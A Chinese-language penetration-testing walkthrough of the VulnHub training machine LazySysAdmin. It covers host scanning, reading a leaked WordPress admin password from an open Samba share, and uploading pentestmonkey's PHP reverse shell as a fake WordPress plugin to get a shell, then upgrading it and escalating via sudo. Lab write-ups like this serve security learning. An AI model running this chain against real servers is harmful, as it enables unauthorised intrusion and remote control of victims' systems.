介绍
系列:LazySysAdmin(此系列共1台)
发布日期:2017 年 9 月 20 日
难度:初级
运行环境:VMware Workstation
目标:取得Root权限
学习:
- samba敏感信息泄露
- wordpress挂马
靶机地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/
信息收集
netdiscover主机发现
sudo netdiscover -i eth0 -r 192.168.229.0/24
主机信息探测
发现SSH运行在777端口
nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144
测试 samba 安全
发现了一个有只读权限的共享目录,使用空口令登录进去。结果发现了很多文件目录。
smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$
使用get,把自己感兴趣的文件下载下来
通过配置文件找到一个账号密码:Admin/TogieMYSQL12345^^
此外还有一个密码:12345
登录网站
网站首页是一个静态页面,没什么有价值的信息。
简单的目录爆破,发现了wordpress:dirsearch -u http://192.168.229.144/ --full-url -x 404,403
页面上的内容一直在告诉我们,他叫togie,那接下来就试试登录吧。
访问默认后台地址:http://192.168.229.144/wordpress/wp-admin
使用Admin/TogieMYSQL12345^^登录成功
攻击者往往通过插件功能反弹shell,下面开始演示WordPress拿shell的一个流程
zip自解压拿webshell
- 下载反弹shell的文件
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php
这个文件,kali已经内置了,位于:/usr/share/webshells/php/php-reverse-shell.php
- 编辑文件
设置反弹shell的地址和端口
编辑虚假的插件的头文件,这一步可做可不做。
- 安装插件
显示安装成功
- 获取shell
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php
提权
首先修复一下shell:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
发现可以提权到togie,然后就是sudo提权了。
